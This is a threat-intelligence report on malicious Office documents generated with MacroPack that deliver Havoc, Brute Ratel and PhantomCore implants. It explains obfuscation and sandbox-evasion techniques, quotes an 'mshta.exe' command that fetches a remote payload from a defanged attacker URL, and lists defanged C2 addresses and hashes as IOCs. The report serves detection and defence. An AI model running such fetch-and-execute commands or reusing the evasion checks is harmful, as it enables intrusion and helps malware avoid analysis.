Headline
Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads
The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable.
- Cisco Talos recently discovered several related Microsoft Office documents uploaded to VirusTotal by various actors between May and July 2024 that were all generated by a version of a payload generator framework called “MacroPack.”
- MacroPack is a framework designated for Red Team exercises, but we assess, with moderate confidence, that malicious actors are also using it to deploy malicious payloads.
- Talos analyzed the most recent documents uploaded to VirusTotal from different sources and countries, including China, Pakistan, Russia and the U.S., uncovering connections between the payloads and motivations for creating these documents.
- These malicious files deliver multiple payloads, including the Havoc and Brute Ratel post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT).
- Talos was not able to attribute these activities to a single actor despite some similarities in tactics, techniques and procedures (TTPs). No Talos customers were affected by these attacks and there are no related activities in any Cisco product telemetry.
The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable.
As a part of regular hunting exercises for malicious documents similar to the ones used by UNC1151, we discovered several suspicious documents using VBA macros that were similar but could not be attributed to the same threat actor.
Although the VBA code was similar — using obfuscated variable and function names and one or more layers of obfuscated code in their following stages — the lure themes were different, ranging from generic topics that instruct users to enable VBA macros, to official-looking documents and letters that appear to come from military organizations, pointing to various distinct threat actors.
Common characteristics of MacroPack VBA code
The VBA code in all the documents had similar characteristics, which we traced to the MacroPack framework. MacroPack can generate several types of payloads packaged into different file types, including popular Office-supported formats, scripting files and shortcuts.
The code generated by the framework has the following characteristics, making it more difficult to detect using file content signatures:
- Function renaming.
- Variable renaming.
- Removal of surplus space characters.
- Removal of comments.
- Strings encoding.
- Payload obfuscation.
A payload string deobfuscation function generated by MacroPack.
MacroPack is designed to be easy to use and quickly generate various payloads allowing users to build working implants with a single command line.
MacroPack also exists in a professional, supported version, which contains additional functionality to make payloads more resilient and has some more advanced features such as anti-malware bypass, more advanced payloads, anti-reversing and additional payloads. The author states that the tool is intended to be used by Red Team members and not for malicious purposes, although there is no control over who uses the free version of the tool.
Inclusion of non-malicious code
A common feature in all the malicious documents we dissected that caught our attention is the existence of four non-malicious VBA subroutines. These subroutines appeared in all the samples and were not obfuscated. They also had never been used by any other malicious subroutines or anywhere else in any documents.
At the beginning of the investigation, we suspected all the documents containing these unusual non-malicious subroutines were created by a single threat actor. But the different document lures and countries from where the documents were uploaded lead us to conclude that those subroutines were included by the professional version of MacroPack, which we confirmed via reliable, high-fidelity sources.
Snippet of code taken from a Word programming book.
We traced the origin of the two functions to a website hosting various VBA examples and one to a French Microsoft Word programming book “Rédigez Facilement Des Documents Avec Word” (“Easily Writing Documents with Word”) by Michel Martin.
Non-malicious functions common for all discovered documents from the VBA examples website.
The inclusion of the benign code is likely to lower the level of suspicion of the code generated by MacroPack. Some anti-malware engines may be able to detect code as suspicious if the entropy of the code is high to indicate pseudo-randomly named variables, functions and obfuscated strings and the inclusion of non-malicious functions with low entropy may be used to lower the overall entropy of the generated code.
Some documents containing the non-malicious code, attributed to MacroPack, also used a different technique for generating code. Instead of completely pseudo-randomly generated variable and function names, they consisted of combinations of randomly chosen real words.
The MacroPack author indicated that he worked on a feature to generate names using Markov chains to create seemingly meaningful function and variable names.
MacroPack author announced the random name generator based on valid English words on X (Twitter).
This functionality was included by the MacroPack author to improve the bypassing of anti-malware heuristic detections. We discovered a few samples using this technique to obfuscate the functionality of the code with meaningful-looking function and variable names.
Function and variable names generated by a Markov chain.
MacroPack documents uploaded to VirusTotal
Although the TTPs in the discovered samples seem malicious and the lure themes indicate that they are, we were unable to trace the actors to a particular group, which also leaves a possibility that they were part of red teaming exercises. However, it is still important to document the samples as blue teams may also encounter them in their own detection tests.
For some discovered samples, we confirmed they were part of some Red Team activities and they are not included in the list of IOCs. A description of a few interesting clusters of documents follows.
All the documents have a similar flow, being generated by the framework and consist of at least three stages of code before connecting to the C2 server, to allow infected systems to be controlled by the threat actors.
Stages of execution for discovered MacroPack-generated documents.
Theme 1: Lures uploaded from China
The first cluster of three documents were uploaded to VirusTotal from IP addresses residing in China, Taiwan and Pakistan in May and July 2024, and feature three similar lures with a generic Word document content that instructs the users to “enable content,” which would allow a VBA macro code to execute. The beginning of the document contains this text either in Chinese or English.
Chinese version of the lure.
All C2 IP addresses for the payloads of the generic template campaign reside in the address space of the same autonomous system, AS4837, located in the Henan province in China, which, together with the usage of similar lure themes and MacroPack, enable us to cluster them as originating from a single actor.
English variant of the lure.
Theme 1 payloads
Two of the three documents, the ones with lures in Chinese, have the Havoc demon (implant) as the final payload. Havoc is a post-exploitation command and control (C2) framework made for penetration testers, Red Teams and Blue Teams. It’s free and open-source on GitHub, written and maintained by Paul Ungur. The Havoc Framework is split into two components — the teamserver and the agent. The Teamserver handles connected operators, tasking agents and parsing the callbacks, results of commands, uploaded files and screenshots. The agents or implants are called demons, in Havoc terminology, and are installed by the operator to the systems that should be controlled.The agents allow the operators to remotely control affected systems.
The difference between the two variants are that they have different IP addresses for C2, and one lure is compiled for 64-bit Windows, while the other is for 32-bit Windows. Both lures are likely related, as they share similar lure themes, have the same AS for C2 addresses and have C2 URLs that appear as if cloud email communication is attempted, together with appropriate referrers set up in HTTP headers.
First Havoc demon communication to C2, with appropriate HTTP headers specified in its configuration buffer.
After the shellcode loads the Havoc demon, the DLL reads its configuration hosts from a plain text structure.
The second payload is a Brute Ratel implant (badger) loaded from a shellcode loader as a DLL. Brute Ratel is a C2 framework primarily used for Red Teaming and adversary simulation, although it was also abused by real threat actors.
Brute Ratel is a very popular framework similar to Cobalt Strike and enables its users to:
- Deploy agents (called badgers) onto target systems.
- Execute commands remotely.
- Perform lateral movement within a network.
- Establish persistence.
- Evade detection by endpoint security solutions.
The configuration for the badger is stored in the shellcode body (approximately 250KB long) and the DLL decrypts it using RC4 decryption with the decryption key hardcoded in the badger executable.
Brute Ratel configuration is decrypted by a RC4 decryption routine in the DLL badger.
Theme 2: Pakistani military lures
The second cluster of documents, with Pakistani military-related themes, were uploaded to VirusTotal from two different locations in Pakistan. We have elected to classify them together based on the military-related themes and a Brute Ratel DLL badger as the final payload.
Pakistani military-themed document lure uploaded to VirusTotal in January 2024.
The first document contains an embedded image of a document masquerading as a circular claiming to announce new awards for certain officer ranks in the Pakistan Air Force, with land plots as a reward for their services. When the document is opened and VBA code allowed to run, the MacroPack-generated code will create a Brute Ratel shellcode loader in memory and execute it to load a badger DLL. The configuration for all DLL implants is contained in the shellcode and is used by the badger after decryption using RC4-based decryption.
The implant in the first document is configured to use DNS over HTTPs with dns[.]google and cloudflare-dns[.]com servers to tunnel the data over DNS for hosts dns1[.]s-logistics[.]net and dns2[.]s-logistics[.]net.
The second lure purports to be a confidential document sent to a specific recipient containing an employment confirmation letter for a civilian member of Pakistan’s Air Force Cyber Team. The payload for this document is also a DLL-based Brute Ratel badger, but this time using several Amazon Cloudfront CDN servers for the C2 rotation.
Pakistani military-themed document lure uploaded to VirusTotal in February 2024.
One interesting characteristic of the second document’s Brute Ratel payload is the inclusion of a base64-encoded blob containing a JSON object created to be used with the Adobe Experience Cloud ecosystem for tracking marketing activities. One possible reason for this is that the document was part of a Red Team exercise and Adobe Experience Cloud was used to track the target’s engagement.
Adobe Experience Cloud requests details from the second document.
Theme 3: Lure uploaded from Russia
A few things stood out when we observed a file created with MacroPack uploaded to VirusTotal from a Russian IP address at the beginning of July 2024. While most of the other files we analyzed were Word documents, this one is an Excel workbook. The lure also is completely void of content, and when the workbook is opened, there is nothing to see.
The VBA code was also a bit different from the ones discovered earlier. Instead of creating a byte array containing shellcode and loading it into the host process, this one had more VBA code for the next stage, and the way it was executed was also quite unusual.
Partially deobfuscated second stage attempt to download and execute a file from a URL
_._The first-stage code generates the second VBA layer, launches a new instance of Excel and creates a new workbook that is the target for the injection of the second stage, similar to VBA virus infection.
When the second stage is executed, it attempts to download, load and execute a file from the URL hxxp[://]td[.]tula-steel[.]ru/en/image[.]jpg. We have no indication that this TTP was successful.
Theme 3 payload
At the time of writing this post, the target URL contained a sample of a Golang-based backdoor PhantomCore, which is attributed by researchers from Kaspersky to the Ukrainian hacktivist Head Mare, allegedly targeting government organizations and companies in Russia with the goal of cyber espionage.
Before connecting to listen for commands, the C2 host and port are retrieved from PhantomCore data.
Some PhantomCore variants are obfuscated with the Golang obfuscator, garble, which makes them more challenging for the analyst, but the core functionality is similar — to connect to a C2 server using the rsocket protocol and listen for commands that allows it to install additional modules, upload data or execute a command.
Theme 4: Uploaded from the U.S.
This final theme was uploaded to VirusTotal much earlier than the previous examples (March 2023) and it purports to be an encrypted NMLS (U.S. Nationwide Multistate Licensing System & Registry) renewal form. We chose this document lure to demonstrate MacroPack’s usage of a Markov Chain-based name generator. This document, similar to the lure uploaded from Russia, has multiple VBA stages.
The first stage decodes the second and launches another Word instance to run it. Before launching the final payload, the second stage checks for the presence of the analysis environment, such as sandboxes and test systems.
The second stage code will exit any the following conditions are satisfied:
- Number of logical CPUs in the system is 1.
- The User name is “USER”.
- One of the following processes are active: fiddler, vxstream, vboxservice, tcpview, vmware, procexp, wmtools, processexplorer, processhacker, vbox, autoit, wireshark, procmon, idaq, autoruns, apatedns or windbg.
- The overall disk size is smaller than 60GB.
- Total memory size is smaller than 1GB.
- Word Application recent files count is smaller than three.
Obfuscated function is checking for presence of analysis environment before downloading the payload.
The final payload was likely supposed to be an HTML application as the download and launch was attempted by executing the command line “mshta.exe hxxps[://]share[.]dedesignanddev[.]com:443/datadoc”. At the time of writing, Talos has not been able to retrieve and identify the final payload.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 63942.
**IOCs **
IOCs for this research can also be found at our GitHub repository here.
Theme 1
0cf1e59bae9dba7fbbf6ee6a36ca6bdb8fa0ac002b8cf824bd0888789a981c57 -64 bit Havoc demon
hxxps[://]122[.]114[.]141[.]214/qq[.]com/ab735a258a90e8e1f3e3dcf231bf53a9/mail/ - Havoc C2
93df1d60edd6b656b08e0fc0d31b330fd275f5e1a9069dfbb769e7ba217fcb6e - Brute Ratel loader
hxxp[://]122[.]114[.]10[.]239/qazxsw -Brute Ratel C2
hxxp[://]122[.]114[.]10[.]239/edcvfr
2131de0cb705afa52f88ef70a87ee6c8662d38db0138efc4940218ee62d8a296 - 32 bit Havoc demon
hxxp[://]122[.]114[.]166[.]92/Collectors/3[.]0/settings/mail/ - Havoc C2
Theme 2
cbafcf65b40d95e4699859a523ef4d300c57f93de6fbc6e194d1b922e9f3aba6 - PAF cyber team lure
b5608e73eb460944d9b523a940d94c95d3eb66d6a8efe82462e2589ccfaadb82 - allotment of plots, Pakistan military
dns1[.]s-logistics[.]net - Brute Ratel C2 - DNS
dns2[.]s-logistics[.]net - Brute Ratel C2 - DNS
hxxps[://]d3qrqtfazjdt5i[.]cloudfront[.]net/HubsExtension/Resource/Type/c8d984[.]php - Brute Ratel C2
hxxps[://]d3qrqtfazjdt5i[.]cloudfront[.]net/HubsExtension/Browse/resourceType/id[.]php
hxxps[://]d2wpc9lcvgj680[.]cloudfront[.]net//HubsExtension/Resource/Type/c8d984[.]php
hxxps[://]d2wpc9lcvgj680[.]cloudfront[.]net/HubsExtension/Browse/resourceType/id[.]php
hxxps[://]d1209brpqetpa4[.]cloudfront[.]net/HubsExtension/Resource/Type/c8d984[.]php
hxxps[://]d1209brpqetpa4[.]cloudfront[.]net/HubsExtension/Browse/resourceType/id[.]php
hxxps[://]d2v6ycjbdzo6ui[.]cloudfront[.]net/HubsExtension/Browse/resourceType/id[.]php
hxxps[://]d2v6ycjbdzo6ui[.]cloudfront[.]net/HubsExtension/Resource/Type/c8d984[.]php
hxxps[://]d2z6sfzo660xrm[.]cloudfront[.]net/HubsExtension/Browse/resourceType/id[.]php
hxxps[://]d2z6sfzo660xrm[.]cloudfront[.]net/HubsExtension/Resource/Type/c8d984[.]php
Theme 3
e1ee389b2af2d3a0eff4aa14f2ac3de6cdd4a73de80b5d450a44ec69cd332dbf - Excel malicious workbook
80731db97c33b50cd3d8727decec7e6a12bbf5f671527648c4cbb559fabc3074 - payload PhantomCore RAT
api.wilbderreis[.]ru - PhantomCore C2, using rsocket protocol on port 80
hxxp[://]td[.]tula-steel[.]ru/en/image[.]jpg
Theme 4
2c0a66c6370b4aa88ab3805d520e868cbc513b43119958257a72c9ff58ef241c - NMLS renewal theme maldoc
hxxps[://]share[.]dedesignanddev[.]com:443/datadoc